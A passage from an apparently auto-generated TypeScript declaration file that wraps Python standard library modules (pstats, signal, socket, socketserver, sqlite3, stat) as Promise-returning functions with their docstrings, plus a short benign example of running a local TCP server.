mapping\n\t\t * of function names to instances of FunctionProfile. 
Each FunctionProfile\n\t\t * instance holds information related to the function's profile such as how\n\t\t * long the function took to run, how many times it was called, etc...\n\t\t * \n\t\t */\n\t\tget_stats_profile(): Promise<any>\n\t\tget_stats_profile$($: {}): Promise<any>\n\t\tget_print_list(sel_list): Promise<any>\n\t\tget_print_list$({ sel_list }): Promise<any>\n\t\tprint_stats(): Promise<any>\n\t\tprint_stats$($: {}): Promise<any>\n\t\tprint_callees(): Promise<any>\n\t\tprint_callees$($: {}): Promise<any>\n\t\tprint_callers(): Promise<any>\n\t\tprint_callers$($: {}): Promise<any>\n\t\tprint_call_heading(name_size, column_title): Promise<any>\n\t\tprint_call_heading$({ name_size, column_title }): Promise<any>\n\t\tprint_call_line(name_size, source, call_dict, arrow?): Promise<any>\n\t\tprint_call_line$({ name_size, source, call_dict, arrow }: { name_size, source, call_dict, arrow?}): Promise<any>\n\t\tprint_title(): Promise<any>\n\t\tprint_title$($: {}): Promise<any>\n\t\tprint_line(func): Promise<any>\n\t\tprint_line$({ func }): Promise<any>\n\t\tsort_arg_dict_default\n\t}\n\n\t/**\n\t * This class provides a generic function for comparing any two tuples.\n\t * Each instance records a list of tuple-indices (from most significant\n\t * to least significant), and sort direction (ascending or descending) for\n\t * each tuple-index. The compare functions can then be used as the function\n\t * argument to the system sort() function when a list of tuples need to be\n\t * sorted in the instances order.\n\t */\n\tfunction TupleComp(comp_select_list): Promise<ITupleComp>\n\tfunction TupleComp$({ comp_select_list }): Promise<ITupleComp>\n\tinterface ITupleComp {\n\t\tcompare(left, right): Promise<any>\n\t\tcompare$({ left, right }): Promise<any>\n\t}\n\tfunction ProfileBrowser(profile?): Promise<IProfileBrowser>\n\tfunction ProfileBrowser$({ profile }: { profile?}): Promise<IProfileBrowser>\n\tinterface IProfileBrowser {\n\t\tgeneric(fn, line): Promise<any>\n\t\tgeneric$({ fn, line }): Promise<any>\n\t\tgeneric_help(): Promise<any>\n\t\tgeneric_help$($: {}): Promise<any>\n\t\tdo_add(line): Promise<any>\n\t\tdo_add$({ line }): Promise<any>\n\t\thelp_add(): Promise<any>\n\t\thelp_add$($: {}): Promise<any>\n\t\tdo_callees(line): Promise<any>\n\t\tdo_callees$({ line }): Promise<any>\n\t\thelp_callees(): Promise<any>\n\t\thelp_callees$($: {}): Promise<any>\n\t\tdo_callers(line): Promise<any>\n\t\tdo_callers$({ line }): Promise<any>\n\t\thelp_callers(): Promise<any>\n\t\thelp_callers$($: {}): Promise<any>\n\t\tdo_EOF(line): Promise<any>\n\t\tdo_EOF$({ line }): Promise<any>\n\t\thelp_EOF(): Promise<any>\n\t\thelp_EOF$($: {}): Promise<any>\n\t\tdo_quit(line): Promise<any>\n\t\tdo_quit$({ line }): Promise<any>\n\t\thelp_quit(): Promise<any>\n\t\thelp_quit$($: {}): Promise<any>\n\t\tdo_read(line): Promise<any>\n\t\tdo_read$({ line }): Promise<any>\n\t\thelp_read(): Promise<any>\n\t\thelp_read$($: {}): Promise<any>\n\t\tdo_reverse(line): Promise<any>\n\t\tdo_reverse$({ line }): Promise<any>\n\t\thelp_reverse(): Promise<any>\n\t\thelp_reverse$($: {}): Promise<any>\n\t\tdo_sort(line): Promise<any>\n\t\tdo_sort$({ line }): Promise<any>\n\t\thelp_sort(): Promise<any>\n\t\thelp_sort$($: {}): Promise<any>\n\t\tcomplete_sort(text): Promise<any>\n\t\tcomplete_sort$({ text }): Promise<any>\n\t\tdo_stats(line): Promise<any>\n\t\tdo_stats$({ line }): Promise<any>\n\t\thelp_stats(): Promise<any>\n\t\thelp_stats$($: {}): Promise<any>\n\t\tdo_strip(line): Promise<any>\n\t\tdo_strip$({ line }): 
Promise<any>\n\t\thelp_strip(): Promise<any>\n\t\thelp_strip$($: {}): Promise<any>\n\t\thelp_help(): Promise<any>\n\t\thelp_help$($: {}): Promise<any>\n\t\tpostcmd(stop, line): Promise<any>\n\t\tpostcmd$({ stop, line }): Promise<any>\n\t}\n\tlet initprofile: Promise<any>\n\tlet browser: Promise<any>\n}\ndeclare module signal {\n\tvar _\n\tfunction signal(signalnum, handler): Promise<any>\n\tfunction signal$({ signalnum, handler }): Promise<any>\n\tfunction getsignal(signalnum): Promise<any>\n\tfunction getsignal$({ signalnum }): Promise<any>\n\tfunction pthread_sigmask(how, mask): Promise<any>\n\tfunction pthread_sigmask$({ how, mask }): Promise<any>\n\tfunction sigpending(): Promise<any>\n\tfunction sigpending$($: {}): Promise<any>\n\tfunction sigwait(sigset): Promise<any>\n\tfunction sigwait$({ sigset }): Promise<any>\n\tfunction valid_signals(): Promise<any>\n\tfunction valid_signals$($: {}): Promise<any>\n}\ndeclare module socket {\n\tvar _\n\n\t/**\n\t * fromfd(fd, family, type[, proto]) -> socket object\n\t * \n\t * Create a socket object from a duplicate of the given file\n\t * descriptor. The remaining arguments are the same as for socket().\n\t * \n\t */\n\tfunction fromfd(fd, family, type, proto?): Promise<any>\n\tfunction fromfd$({ fd, family, type, proto }: { fd, family, type, proto?}): Promise<any>\n\n\t/**\n\t * send_fds(sock, buffers, fds[, flags[, address]]) -> integer\n\t * \n\t * Send the list of file descriptors fds over an AF_UNIX socket.\n\t * \n\t */\n\tfunction send_fds(sock, buffers, fds, flags?, address?): Promise<any>\n\tfunction send_fds$({ sock, buffers, fds, flags, address }: { sock, buffers, fds, flags?, address?}): Promise<any>\n\n\t/**\n\t * recv_fds(sock, bufsize, maxfds[, flags]) -> (data, list of file\n\t * descriptors, msg_flags, address)\n\t * \n\t * Receive up to maxfds file descriptors returning the message\n\t * data and a list containing the descriptors.\n\t * \n\t */\n\tfunction recv_fds(sock, bufsize, maxfds, flags?): Promise<any>\n\tfunction recv_fds$({ sock, bufsize, maxfds, flags }: { sock, bufsize, maxfds, flags?}): Promise<any>\n\n\t/**\n\t * fromshare(info) -> socket object\n\t * \n\t * Create a socket object from the bytes object returned by\n\t * socket.share(pid).\n\t * \n\t */\n\tfunction fromshare(info): Promise<any>\n\tfunction fromshare$({ info }): Promise<any>\n\n\t/**\n\t * socketpair([family[, type[, proto]]]) -> (socket object, socket object)\n\t * \n\t * Create a pair of socket objects from the sockets returned by the platform\n\t * socketpair() function.\n\t * The arguments are the same as for socket() except the default family is\n\t * AF_UNIX if defined on the platform; otherwise, the default is AF_INET.\n\t * \n\t */\n\tfunction socketpair(family?, type?, proto?): Promise<any>\n\tfunction socketpair$({ family, type, proto }: { family?, type?, proto?}): Promise<any>\n\n\t/**\n\t * Get fully qualified domain name from name.\n\t * \n\t * An empty argument is interpreted as meaning the local host.\n\t * \n\t * First the hostname returned by gethostbyaddr() is checked, then\n\t * possibly existing aliases. 
In case no FQDN is available, hostname\n\t * from gethostname() is returned.\n\t * \n\t */\n\tfunction getfqdn(name?): Promise<any>\n\tfunction getfqdn$({ name }: { name?}): Promise<any>\n\n\t/**\n\t * Connect to *address* and return the socket object.\n\t * \n\t * Convenience function. Connect to *address* (a 2-tuple ``(host,\n\t * port)``) and return the socket object. Passing the optional\n\t * *timeout* parameter will set the timeout on the socket instance\n\t * before attempting to connect. If no *timeout* is supplied, the\n\t * global default timeout setting returned by :func:`getdefaulttimeout`\n\t * is used. If *source_address* is set it must be a tuple of (host, port)\n\t * for the socket to bind as a source address before making the connection.\n\t * A host of '' or port 0 tells the OS to use the default.\n\t * \n\t */\n\tfunction create_connection(address, timeout?, source_address?): Promise<any>\n\tfunction create_connection$({ address, timeout, source_address }: { address, timeout?, source_address?}): Promise<any>\n\n\t/**\n\t * Return True if the platform supports creating a SOCK_STREAM socket\n\t * which can handle both AF_INET and AF_INET6 (IPv4 / IPv6) connections.\n\t * \n\t */\n\tfunction has_dualstack_ipv6(): Promise<any>\n\tfunction has_dualstack_ipv6$($: {}): Promise<any>\n\n\t/**\n\t * Convenience function which creates a SOCK_STREAM type socket\n\t * bound to *address* (a 2-tuple (host, port)) and return the socket\n\t * object.\n\t * \n\t * *family* should be either AF_INET or AF_INET6.\n\t * *backlog* is the queue size passed to socket.listen().\n\t * *reuse_port* dictates whether to use the SO_REUSEPORT socket option.\n\t * *dualstack_ipv6*: if true and the platform supports it, it will\n\t * create an AF_INET6 socket able to accept both IPv4 or IPv6\n\t * connections. When false it will explicitly disable this option on\n\t * platforms that enable it by default (e.g. Linux).\n\t * \n\t * >>> with create_server(('', 8000)) as server:\n\t * ... while True:\n\t * ... conn, addr = server.accept()\n\t * ... # handle new connection\n\t * \n\t */\n\tfunction create_server(address): Promise<any>\n\tfunction create_server$({ address }): Promise<any>\n\n\t/**\n\t * Resolve host and port into list of address info entries.\n\t * \n\t * Translate the host/port argument into a sequence of 5-tuples that contain\n\t * all the necessary arguments for creating a socket connected to that service.\n\t * host is a domain name, a string representation of an IPv4/v6 address or\n\t * None. port is a string service name such as 'http', a numeric port number or\n\t * None. By passing None as the value of host and port, you can pass NULL to\n\t * the underlying C API.\n\t * \n\t * The family, type and proto arguments can be optionally specified in order to\n\t * narrow the list of addresses returned. 
Passing zero as a value for each of\n\t * these arguments selects the full range of results.\n\t * \n\t */\n\tfunction getaddrinfo(host, port, family?, type?, proto?, flags?): Promise<any>\n\tfunction getaddrinfo$({ host, port, family, type, proto, flags }: { host, port, family?, type?, proto?, flags?}): Promise<any>\n\tinterface I_GiveupOnSendfile {\n\t}\n\n\t/**\n\t * A subclass of _socket.socket adding the makefile() method.\n\t */\n\tfunction socket(family?, type?, proto?, fileno?): Promise<Isocket>\n\tfunction socket$({ family, type, proto, fileno }: { family?, type?, proto?, fileno?}): Promise<Isocket>\n\tinterface Isocket {\n\n\t\t/**\n\t\t * dup() -> socket object\n\t\t * \n\t\t * Duplicate the socket. Return a new socket object connected to the same\n\t\t * system resource. The new socket is non-inheritable.\n\t\t * \n\t\t */\n\t\tdup(): Promise<any>\n\t\tdup$($: {}): Promise<any>\n\n\t\t/**\n\t\t * accept() -> (socket object, address info)\n\t\t * \n\t\t * Wait for an incoming connection. Return a new socket\n\t\t * representing the connection, and the address of the client.\n\t\t * For IP sockets, the address info is a pair (hostaddr, port).\n\t\t * \n\t\t */\n\t\taccept(): Promise<any>\n\t\taccept$($: {}): Promise<any>\n\n\t\t/**\n\t\t * makefile(...) -> an I/O stream connected to the socket\n\t\t * \n\t\t * The arguments are as for io.open() after the filename, except the only\n\t\t * supported mode values are 'r' (default), 'w' and 'b'.\n\t\t * \n\t\t */\n\t\tmakefile(mode?, buffering?): Promise<any>\n\t\tmakefile$({ mode, buffering }: { mode?, buffering?}): Promise<any>\n\n\t\t/**\n\t\t * sendfile(file[, offset[, count]]) -> sent\n\t\t * \n\t\t * Send a file until EOF is reached by using high-performance\n\t\t * os.sendfile() and return the total number of bytes which\n\t\t * were sent.\n\t\t * *file* must be a regular file object opened in binary mode.\n\t\t * If os.sendfile() is not available (e.g. Windows) or file is\n\t\t * not a regular file socket.send() will be used instead.\n\t\t * *offset* tells from where to start reading the file.\n\t\t * If specified, *count* is the total number of bytes to transmit\n\t\t * as opposed to sending the file until EOF is reached.\n\t\t * File position is updated on return or also in case of error in\n\t\t * which case file.tell() can be used to figure out the number of\n\t\t * bytes which were sent.\n\t\t * The socket must be of SOCK_STREAM type.\n\t\t * Non-blocking sockets are not supported.\n\t\t * \n\t\t */\n\t\tsendfile(file, offset?, count?): Promise<any>\n\t\tsendfile$({ file, offset, count }: { file, offset?, count?}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * detach() -> file descriptor\n\t\t * \n\t\t * Close the socket object without closing the underlying file descriptor.\n\t\t * The object cannot be used after this call, but the file descriptor\n\t\t * can be reused for other purposes. The file descriptor is returned.\n\t\t * \n\t\t */\n\t\tdetach(): Promise<any>\n\t\tdetach$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read-only access to the address family for this socket.\n\t\t * \n\t\t */\n\t\tfamily(): Promise<any>\n\t\tfamily$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read-only access to the socket type.\n\t\t * \n\t\t */\n\t\ttype(): Promise<any>\n\t\ttype$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Raw I/O implementation for stream sockets.\n\t * \n\t * This class supports the makefile() method on sockets. 
It provides\n\t * the raw I/O interface on top of a socket object.\n\t * \n\t */\n\tfunction SocketIO(sock, mode): Promise<ISocketIO>\n\tfunction SocketIO$({ sock, mode }): Promise<ISocketIO>\n\tinterface ISocketIO {\n\n\t\t/**\n\t\t * Read up to len(b) bytes into the writable buffer *b* and return\n\t\t * the number of bytes read. If the socket is non-blocking and no bytes\n\t\t * are available, None is returned.\n\t\t * \n\t\t * If *b* is non-empty, a 0 return value indicates that the connection\n\t\t * was shutdown at the other end.\n\t\t * \n\t\t */\n\t\treadinto(b): Promise<any>\n\t\treadinto$({ b }): Promise<any>\n\n\t\t/**\n\t\t * Write the given bytes or bytearray object *b* to the socket\n\t\t * and return the number of bytes written. This can be less than\n\t\t * len(b) if not all data could be written. If the socket is\n\t\t * non-blocking and no bytes could be written None is returned.\n\t\t * \n\t\t */\n\t\twrite(b): Promise<any>\n\t\twrite$({ b }): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for reading.\n\t\t * \n\t\t */\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for writing.\n\t\t * \n\t\t */\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for seeking.\n\t\t * \n\t\t */\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the file descriptor of the underlying socket.\n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tmode(): Promise<any>\n\t\tmode$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Close the SocketIO object. This doesn't close the underlying\n\t\t * socket, except if all references to it have disappeared.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tlet EBADF: Promise<any>\n\tlet EAGAIN: Promise<any>\n\tlet EWOULDBLOCK: Promise<any>\n\tlet errorTab: Promise<any>\n}\ndeclare module socketserver {\n\tvar _\n\n\t/**\n\t * Base class for server classes.\n\t * \n\t * Methods for the caller:\n\t * \n\t * - __init__(server_address, RequestHandlerClass)\n\t * - serve_forever(poll_interval=0.5)\n\t * - shutdown()\n\t * - handle_request() # if you do not use serve_forever()\n\t * - fileno() -> int # for selector\n\t * \n\t * Methods that may be overridden:\n\t * \n\t * - server_bind()\n\t * - server_activate()\n\t * - get_request() -> request, client_address\n\t * - handle_timeout()\n\t * - verify_request(request, client_address)\n\t * - server_close()\n\t * - process_request(request, client_address)\n\t * - shutdown_request(request)\n\t * - close_request(request)\n\t * - service_actions()\n\t * - handle_error()\n\t * \n\t * Methods for derived classes:\n\t * \n\t * - finish_request(request, client_address)\n\t * \n\t * Class variables that may be overridden by derived classes or\n\t * instances:\n\t * \n\t * - timeout\n\t * - address_family\n\t * - socket_type\n\t * - allow_reuse_address\n\t * \n\t * Instance variables:\n\t * \n\t * - RequestHandlerClass\n\t * - socket\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor. 
May be extended, do not override.\n\t */\n\tfunction BaseServer(server_address, RequestHandlerClass): Promise<IBaseServer>\n\tfunction BaseServer$({ server_address, RequestHandlerClass }): Promise<IBaseServer>\n\tinterface IBaseServer {\n\n\t\t/**\n\t\t * Called by constructor to activate the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Handle one request at a time until shutdown.\n\t\t * \n\t\t * Polls for shutdown every poll_interval seconds. Ignores\n\t\t * self.timeout. If you need to do periodic tasks, do them in\n\t\t * another thread.\n\t\t * \n\t\t */\n\t\tserve_forever(poll_interval?): Promise<any>\n\t\tserve_forever$({ poll_interval }: { poll_interval?}): Promise<any>\n\n\t\t/**\n\t\t * Stops the serve_forever loop.\n\t\t * \n\t\t * Blocks until the loop has finished. This must be called while\n\t\t * serve_forever() is running in another thread, or it will\n\t\t * deadlock.\n\t\t * \n\t\t */\n\t\tshutdown(): Promise<any>\n\t\tshutdown$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called by the serve_forever() loop.\n\t\t * \n\t\t * May be overridden by a subclass / Mixin to implement any code that\n\t\t * needs to be run during the loop.\n\t\t * \n\t\t */\n\t\tservice_actions(): Promise<any>\n\t\tservice_actions$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Handle one request, possibly blocking.\n\t\t * \n\t\t * Respects self.timeout.\n\t\t * \n\t\t */\n\t\thandle_request(): Promise<any>\n\t\thandle_request$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called if no new request arrives within self.timeout.\n\t\t * \n\t\t * Overridden by ForkingMixIn.\n\t\t * \n\t\t */\n\t\thandle_timeout(): Promise<any>\n\t\thandle_timeout$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Verify the request. May be overridden.\n\t\t * \n\t\t * Return True if we should proceed with this request.\n\t\t * \n\t\t * \n\t\t */\n\t\tverify_request(request, client_address): Promise<any>\n\t\tverify_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Call finish_request.\n\t\t * \n\t\t * Overridden by ForkingMixIn and ThreadingMixIn.\n\t\t * \n\t\t * \n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean-up the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Finish one request by instantiating RequestHandlerClass.\n\t\t */\n\t\tfinish_request(request, client_address): Promise<any>\n\t\tfinish_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Called to shutdown and close an individual request.\n\t\t */\n\t\tshutdown_request(request): Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean up an individual request.\n\t\t */\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Handle an error gracefully. 
May be overridden.\n\t\t * \n\t\t * The default is to print a traceback and continue.\n\t\t * \n\t\t * \n\t\t */\n\t\thandle_error(request, client_address): Promise<any>\n\t\thandle_error$({ request, client_address }): Promise<any>\n\t\ttimeout\n\t}\n\n\t/**\n\t * Base class for various socket-based server classes.\n\t * \n\t * Defaults to synchronous IP stream (i.e., TCP).\n\t * \n\t * Methods for the caller:\n\t * \n\t * - __init__(server_address, RequestHandlerClass, bind_and_activate=True)\n\t * - serve_forever(poll_interval=0.5)\n\t * - shutdown()\n\t * - handle_request() # if you don't use serve_forever()\n\t * - fileno() -> int # for selector\n\t * \n\t * Methods that may be overridden:\n\t * \n\t * - server_bind()\n\t * - server_activate()\n\t * - get_request() -> request, client_address\n\t * - handle_timeout()\n\t * - verify_request(request, client_address)\n\t * - process_request(request, client_address)\n\t * - shutdown_request(request)\n\t * - close_request(request)\n\t * - handle_error()\n\t * \n\t * Methods for derived classes:\n\t * \n\t * - finish_request(request, client_address)\n\t * \n\t * Class variables that may be overridden by derived classes or\n\t * instances:\n\t * \n\t * - timeout\n\t * - address_family\n\t * - socket_type\n\t * - request_queue_size (only for stream sockets)\n\t * - allow_reuse_address\n\t * \n\t * Instance variables:\n\t * \n\t * - server_address\n\t * - RequestHandlerClass\n\t * - socket\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor. May be extended, do not override.\n\t */\n\tfunction TCPServer(server_address, RequestHandlerClass, bind_and_activate?: boolean): Promise<ITCPServer>\n\tfunction TCPServer$({ server_address, RequestHandlerClass, bind_and_activate }: { server_address, RequestHandlerClass, bind_and_activate?}): Promise<ITCPServer>\n\tinterface ITCPServer extends IBaseServer {\n\n\t\t/**\n\t\t * Called by constructor to bind the socket.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_bind(): Promise<any>\n\t\tserver_bind$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called by constructor to activate the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called to clean-up the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return socket file number.\n\t\t * \n\t\t * Interface required by selector.\n\t\t * \n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Get the request and client address from the socket.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tget_request(): Promise<any>\n\t\tget_request$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called to shutdown and close an individual request.\n\t\t */\n\t\tshutdown_request(request): Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean up an individual request.\n\t\t */\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\t\taddress_family\n\t\tsocket_type\n\t\trequest_queue_size\n\t\tallow_reuse_address\n\t}\n\n\t/**\n\t * UDP server class.\n\t */\n\tinterface IUDPServer extends ITCPServer {\n\t\tget_request(): Promise<any>\n\t\tget_request$($: {}): Promise<any>\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\t\tshutdown_request(request): 
Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\t\tmax_packet_size\n\t}\n\n\t/**\n\t * Mix-in class to handle each request in a new process.\n\t */\n\tinterface IForkingMixIn {\n\n\t\t/**\n\t\t * Internal routine to wait for children that have exited.\n\t\t */\n\t\tcollect_children(): Promise<any>\n\t\tcollect_children$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait for zombies after self.timeout seconds of inactivity.\n\t\t * \n\t\t * May be extended, do not override.\n\t\t * \n\t\t */\n\t\thandle_timeout(): Promise<any>\n\t\thandle_timeout$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Collect the zombie child processes regularly in the ForkingMixIn.\n\t\t * \n\t\t * service_actions is called in the BaseServer's serve_forever loop.\n\t\t * \n\t\t */\n\t\tservice_actions(): Promise<any>\n\t\tservice_actions$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Fork a new subprocess to process the request.\n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\t\tactive_children\n\t\tmax_children\n\t\tblock_on_close\n\t}\n\n\t/**\n\t * \n\t * Joinable list of all non-daemon threads.\n\t * \n\t */\n\tinterface I_Threads {\n\t\tappend(thread): Promise<any>\n\t\tappend$({ thread }): Promise<any>\n\t\tpop_all(): Promise<any>\n\t\tpop_all$($: {}): Promise<any>\n\t\tjoin(): Promise<any>\n\t\tjoin$($: {}): Promise<any>\n\t\treap(): Promise<any>\n\t\treap$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * Degenerate version of _Threads.\n\t * \n\t */\n\tinterface I_NoThreads {\n\t\tappend(thread): Promise<any>\n\t\tappend$({ thread }): Promise<any>\n\t\tjoin(): Promise<any>\n\t\tjoin$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Mix-in class to handle each request in a new thread.\n\t */\n\tinterface IThreadingMixIn {\n\n\t\t/**\n\t\t * Same as in BaseServer but as a thread.\n\t\t * \n\t\t * In addition, exception handling is done here.\n\t\t * \n\t\t * \n\t\t */\n\t\tprocess_request_thread(request, client_address): Promise<any>\n\t\tprocess_request_thread$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Start a new thread to process the request.\n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\t\tdaemon_threads\n\t}\n\tinterface IForkingUDPServer extends IForkingMixIn, IUDPServer {\n\t}\n\tinterface IForkingTCPServer extends IForkingMixIn, ITCPServer {\n\t}\n\tinterface IThreadingUDPServer extends IThreadingMixIn, IUDPServer {\n\t}\n\tinterface IThreadingTCPServer extends IThreadingMixIn, ITCPServer {\n\t}\n\tinterface IUnixStreamServer extends ITCPServer {\n\t}\n\tinterface IUnixDatagramServer extends IUDPServer {\n\t}\n\tinterface IThreadingUnixStreamServer extends IThreadingMixIn, IUnixStreamServer {\n\t}\n\tinterface IThreadingUnixDatagramServer extends IThreadingMixIn, IUnixDatagramServer {\n\t}\n\n\t/**\n\t * Base class for request handler classes.\n\t * \n\t * This class is instantiated for each request to be handled. The\n\t * constructor sets the instance variables request, client_address\n\t * and server, and then calls the handle() method. 
To implement a\n\t * specific service, all you need to do is derive a class that\n\t * defines a handle() method.\n\t * \n\t * The handle() method can find the request as self.request, the\n\t * client address as self.client_address, and the server (in case it\n\t * needs access to per-server information) as self.server. Since a\n\t * separate instance is created for each request, the handle() method\n\t * can define other arbitrary instance variables.\n\t * \n\t * \n\t */\n\tfunction BaseRequestHandler(request, client_address, server): Promise<IBaseRequestHandler>\n\tfunction BaseRequestHandler$({ request, client_address, server }): Promise<IBaseRequestHandler>\n\tinterface IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\thandle(): Promise<any>\n\t\thandle$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Define self.rfile and self.wfile for stream sockets.\n\t */\n\tinterface IStreamRequestHandler extends IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t\trbufsize\n\t\twbufsize\n\t\tdisable_nagle_algorithm\n\t}\n\n\t/**\n\t * Simple writable BufferedIOBase implementation for a socket\n\t * \n\t * Does not hold data in a buffer, avoiding any need to call flush().\n\t */\n\tinterface I_SocketWriter {\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\twrite(b): Promise<any>\n\t\twrite$({ b }): Promise<any>\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Define self.rfile and self.wfile for datagram sockets.\n\t */\n\tinterface IDatagramRequestHandler extends IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t}\n}
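\n\n// Example (added): a hedged sketch of driving the declared socketserver API.\n// `EchoHandler` and the ['127.0.0.1', 8000] address pair are assumptions of this\n// sketch, not part of the generated declarations; every wrapped call resolves\n// through a Promise.\n//\n//   const srv = await socketserver.TCPServer(['127.0.0.1', 8000], EchoHandler)\n//   srv.serve_forever()        // polls for shutdown every 0.5 s by default\n//   // ... later, from another thread of control:\n//   await srv.shutdown()\n//   await srv.server_close()\n\ndeclare module sqlite3 {\n\tvar _\n\tmodule dbapi2 {\n\t\tvar _\n\t\tfunction DateFromTicks(ticks): Promise<any>\n\t\tfunction DateFromTicks$({ ticks }): Promise<any>\n\t\tfunction TimeFromTicks(ticks): Promise<any>\n\t\tfunction TimeFromTicks$({ ticks }): Promise<any>\n\t\tfunction TimestampFromTicks(ticks): Promise<any>\n\t\tfunction TimestampFromTicks$({ ticks }): Promise<any>\n\t\tfunction register_adapters_and_converters(): Promise<any>\n\t\tfunction register_adapters_and_converters$($: {}): Promise<any>\n\t\tfunction enable_shared_cache(enable): Promise<any>\n\t\tfunction enable_shared_cache$({ enable }): Promise<any>\n\t\tlet paramstyle: Promise<any>\n\t\tlet threadsafety: Promise<any>\n\t\tlet apilevel: Promise<any>\n\t\tlet Date: Promise<any>\n\t\tlet Time: Promise<any>\n\t\tlet Timestamp: Promise<any>\n\t\tlet version_info: Promise<any>\n\t\tlet sqlite_version_info: Promise<any>\n\t\tlet Binary: Promise<any>\n\t}\n\tmodule dump {\n\t\tvar _\n\t}\n}\ndeclare module stat {\n\tvar _\n\n\t/**\n\t * Return the portion of the file's mode that can be set by\n\t * os.chmod().\n\t * \n\t */\n\tfunction S_IMODE(mode): Promise<any>\n\tfunction S_IMODE$({ mode }): Promise<any>\n\n\t/**\n\t * Return the portion of the file's mode that describes the\n\t * file type.\n\t * \n\t */\n\tfunction S_IFMT(mode): Promise<any>\n\tfunction S_IFMT$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a directory.\n\t */\n\tfunction S_ISDIR(mode): Promise<any>\n\tfunction S_ISDIR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a character special device file.\n\t */\n\tfunction S_ISCHR(mode): Promise<any>\n\tfunction 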
